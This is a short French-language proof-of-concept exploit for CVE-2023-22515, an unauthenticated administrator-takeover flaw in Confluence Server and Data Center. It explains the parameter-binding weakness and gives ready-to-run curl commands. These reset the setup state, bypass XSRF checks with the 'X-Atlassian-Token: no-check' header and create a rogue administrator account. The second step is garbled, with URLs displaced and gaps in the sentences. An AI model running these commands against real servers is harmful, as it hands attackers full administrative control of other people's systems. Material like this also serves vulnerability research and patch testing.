
Exploit de preuve de concept pour CVE-2023-22515, une vulnérabilité critique de contrôle d'accès cassé dans Confluence Server et Data Center, permettant une prise de contrôle administrative non authentifiée.
CVE-2023-22515, une vulnérabilité critique affectant les instances sur site de Confluence Server et Confluence Data Center, une vulnérabilité de contrôle d'accès brisé. Attlassian a attribué un score CVSS de base de 10.0
1- En raison de la façon dont les intercepteurs Xwork analysent les paramètres, /test.action?one=a équivaut à setOne()='a' et /test.action?one.two=a équivaut à getOne().setTwo()="a"
2- Les points de terminaison /setup/* incluent un appel @ParameterSafe qui nous permet d'utiliser les méthodes set et get comme dans . Cependant, comme les points de terminaison sont bloqués car la configuration est terminée, peut être utilisé
/setup/setupdb.action?dbConfigInfo.databaseType=postgresql/setup/*/server-info.action3- Trouvez la méthode set pour terminer la configuration => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);
4- Utilisez l'en-tête "X-Atlassian-Token" pour contourner XSRF
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\;
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\;
curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action
AVERTISSEMENT : L'exploit n'a pas été découvert ou créé par moi, le crédit revient aux articles ci-dessous